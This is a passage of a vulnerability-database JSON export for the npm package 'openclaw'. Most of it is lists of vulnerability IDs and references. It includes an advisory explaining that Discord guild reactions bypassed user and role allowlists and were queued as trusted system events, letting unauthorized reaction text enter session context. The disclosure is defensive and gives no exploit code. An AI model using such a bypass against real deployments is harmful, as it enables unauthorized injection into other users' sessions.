A-rm59-992w-x2mv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rm59-992w-x2mv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35626","GHSA-rm59-992w-x2mv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5s6h-u8x6-myfk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91798?format=json","vulnerability_id":"VCID-5u41-c7kc-u7fe","summary":"OpenClaw: Discord guild reaction ingress could bypass users and roles allowlists\n## Summary\nIn affected versions of `openclaw`, Discord reaction ingestion for guild channels did not enforce the same member users and roles allowlist checks used for normal inbound guild messages. A non-allowlisted guild member could still trigger reaction events that were accepted and queued as trusted system events for the target session.\n\n## Impact\nThis is an authorization bypass in the Discord allowlist path. Reaction text could be injected into downstream session context even when the reacting guild member was not permitted by the configured users or roles allowlist.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.3.11`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe reaction ingress authorization path enforced DM, group, guild, and channel policy checks, but it did not apply the member-level users and roles allowlist gate that normal guild-message preflight uses. Accepted reactions were then enqueued as trusted system events for the routed session.\n\n## Fix\nOpenClaw now applies the same users and roles allowlist enforcement to guild reaction ingress that it already applies to normal inbound guild messages. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9vvh-2768-c8vp","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9vvh-2768-c8vp"},{"reference_url":"https://github.com/advisories/GHSA-9vvh-2768-c8vp","reference_id":"GHSA-9vvh-2768-c8vp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9vvh-2768-c8vp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"